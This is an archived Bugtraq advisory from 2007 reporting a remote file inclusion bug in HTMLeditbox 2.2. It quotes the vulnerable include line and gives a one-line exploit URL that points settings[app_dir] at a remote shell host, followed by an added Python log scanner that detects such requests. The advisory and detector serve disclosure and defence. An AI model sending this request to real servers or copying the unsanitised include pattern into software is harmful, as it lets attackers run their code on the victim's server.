Bugtraq mailing list archives

HTMLeditbox & 2.2 >> RFI


From: alijsb () yahoo com
Date: 25 Apr 2007 10:52:50 -0000

+++++++
name & version :HTMLeditbox & 2.2
vendor: http://www.labs4.com
by : www.hackerz.ir userz,s3rv3r_hack3r,saeid_only_linux,dNetGuru
bug :
_editor.php     @include($settings[app_dir].'/inc/config.php');
exploit :
http://victim/_editor.php?settings[app_dir]=http://shell
++++++
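
Added example, not part of the original post: a log check for requests shaped like the one above, where a query parameter such as `settings[app_dir]` carries a URL instead of a local path. It generalizes to any parameter name and to percent-encoded forms; the combined log format, the sample lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside an Apache/nginx "combined" log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value begins with a scheme that PHP include() can resolve via a stream wrapper.
WRAPPER_RE = re.compile(r'^\s*(?:(?:https?|ftps?|php|expect)://|data:)', re.I)


def find_remote_include_params(log_line):
    """Return [(param, value)] for query parameters whose value is a URL/wrapper."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    query = urlsplit(m.group(1)).query
    # parse_qsl percent-decodes names and values, so settings%5Bapp_dir%5D and
    # http%3A%2F%2F... are caught as well as the literal forms.
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if WRAPPER_RE.match(v)]


def scan(lines):
    """Return {line_index: hits} for every line carrying a suspicious parameter."""
    findings = {}
    for i, line in enumerate(lines):
        hits = find_remote_include_params(line)
        if hits:
            findings[i] = hits
    return findings


# Constructed sample log lines (not taken from the original post).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Apr/2007:11:02:13 +0000] '
    '"GET /_editor.php?settings[app_dir]=http://remote.example/x HTTP/1.1" 200 512',
    '192.0.2.11 - - [25/Apr/2007:11:02:40 +0000] '
    '"GET /_editor.php?settings%5Bapp_dir%5D=http%3A%2F%2Fremote.example%2Fx HTTP/1.1" 200 512',
    '192.0.2.12 - - [25/Apr/2007:11:03:01 +0000] '
    '"GET /_editor.php?field=body&lang=en HTTP/1.1" 200 2048',
    '192.0.2.13 - - [25/Apr/2007:11:03:09 +0000] '
    '"GET /redirect.php?next=/home HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(f"line {idx}: {hits}")
```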

